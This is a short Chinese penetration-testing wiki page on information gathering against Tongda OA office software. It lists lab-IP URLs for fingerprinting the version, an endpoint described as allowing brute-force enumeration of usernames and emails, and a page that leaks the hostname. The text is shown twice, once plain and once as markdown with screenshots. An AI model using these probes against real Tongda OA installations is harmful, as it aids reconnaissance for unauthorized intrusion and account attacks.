fofamini-wiki

登录白背景

源码

通达OA-信息收集

1.判断通达版本

http://192.168.31.62/inc/expired.php

http://192.168.31.90/inc/reg_trial.php

http://192.168.31.90/inc/reg_trial_submit.php

爆用户名和邮箱

http://192.168.31.62/ispirit/retrieve_pwd.php?username=admin
get请求，参数username、email可爆破用户名、邮箱

主机名

http://192.168.31.62/resque/worker.php

原文: https://www.yuque.com/xiaokp7/ocvun2/lgm9av1spt1rx0x4

# 通达OA-信息收集

1.判断通达版本
```java
http://192.168.31.62/inc/expired.php
```
![image.png](./img/W-egrSgep5hgNoBQ/1679846523095-50598c05-a8d0-401a-9667-6d6e049927f6-018342.png)
```java
http://192.168.31.90/inc/reg_trial.php
```
![image.png](./img/W-egrSgep5hgNoBQ/1687082698649-e6ae461a-b6fd-4d45-ab0d-3910dc28b247-467534.png)
```java
http://192.168.31.90/inc/reg_trial_submit.php
```
![image.png](./img/W-egrSgep5hgNoBQ/1687082738371-724ae0b4-ad09-4e8a-a04b-2b80c5d815ba-659167.png)

2. 爆用户名和邮箱
```java
http://192.168.31.62/ispirit/retrieve_pwd.php?username=admin
get请求，参数username、email可爆破用户名、邮箱
```
![image.png](./img/W-egrSgep5hgNoBQ/1679846874871-926c968e-784c-4c4f-ab86-fbfd505ac60e-369359.png)
![image.png](./img/W-egrSgep5hgNoBQ/1679846883976-3f39a753-a45c-4d7f-883f-b86235f4f09f-282128.png)

3. 主机名
```java
http://192.168.31.62/resque/worker.php
```
![image.png](./img/W-egrSgep5hgNoBQ/1679846926413-70c150de-62a8-46a6-b68f-149f1f3840a5-741712.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lgm9av1spt1rx0x4>